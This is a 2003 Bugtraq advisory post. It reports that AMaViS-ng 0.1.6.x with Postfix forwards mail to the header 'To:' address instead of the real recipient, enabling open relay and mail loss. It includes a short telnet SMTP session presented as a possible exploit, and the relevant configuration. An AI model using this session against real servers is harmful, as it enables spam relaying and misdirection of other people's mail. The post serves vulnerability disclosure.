Bugtraq mailing list archives
AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss
From: Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1 () protected unixadm org>
Date: Mon, 7 Apr 2003 14:23:47 +0200
Hi everyone - with postfix using AMaViS-ng 0.1.6.x (tested: 0.1.6.2 and 0.1.6.3; 0.1.4.x is not vulnerable), all email gets forwarded to the address specified by the "To:" header line, ignoring the real recipient given via "RCPT TO:". Possible exploit: --%snip%-- #> telnet somemx.domain.tld 25 (220 somemx.domain.tld ESMTP Postfix) helo amavis-ng (250 somemx.domain.tld) mail from:userX () domainX tld (250 ok) rcpt to:userY () domain tld (250 ok) data (354 End data with <CR><LF>.<CR><LF>) From: userX () domainX tld To: userZ () domainZ tld Subject: AMaViS-ng 0.1.6.x bug . (250 Ok: queued as ...) quit (221 Bye) --%snip%-- Requirements: The mx (somemx.domain.tld) having postfix and AMaViS-ng 0.1.6.x installed must accept emails for userY () domain tld. What does it to: userX () domainX tld is sending an email to userY () domain tld. The header of this email contains "To: userZ () domain tld". AMaViS-ng seems to parse the header and forwards the email to userZ () domain tld. userY () domain tld does not get this email. As many postfix users trust their localhost (no restrictions for localhost), it is possible to relay an email or a spam mail this way. configuration files (relevant parts): # $postfix/master.cf smtp inet n - n - - smtpd -o content_filter=filter: filter unix - n n - - pipe flags=Rq user=mail argv=/usr/bin/amavis ${sender} -- ${recipient} # end of master.cf # $amavis-ng/amavis.conf [global] mail-transfer-agent = Postfix [Postfix] postfix = /usr/sbin/sendmail args = -i -f # end of amavis.conf There is no problem with AMaViS == 0.1.4.x Kind regards, Phil Cyc
Current thread:
- AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss Phil Cyc (Apr 08)
- Re: AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss Phil Cyc (Apr 09)
- <Possible follow-ups>
- Re: AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss Hilko Bengen (Apr 12)